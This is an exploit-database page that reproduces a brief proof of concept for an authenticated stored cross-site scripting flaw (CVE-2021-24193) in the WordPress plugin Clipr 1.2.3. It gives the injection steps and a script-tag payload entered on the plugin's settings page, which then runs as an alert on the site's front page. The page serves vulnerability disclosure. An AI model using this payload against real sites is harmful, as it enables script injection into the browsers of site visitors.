WordPress Clipr 1.2.3 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24193 CWE-79 N/A Medium
Author Risk Exploitation Type Date
Unknown High Remote 2022-03-30

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WordPress Clipr 1.2.3 Cross Site Scripting
# Exploit Title: WordPress plugin clipr version 1.2.3 - ( Authenticated )
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage:
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at]


- Install Plugin
- Navigate to the settings page pf the plugin:
- Inject paylaod `asdasd'></script><script>alert(1)</script>`
- Navigate to the main page of the WordPress URL
`http://localhost:10003/` <http://localhost:10003/>
- Malicious Javascript payload will execute.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.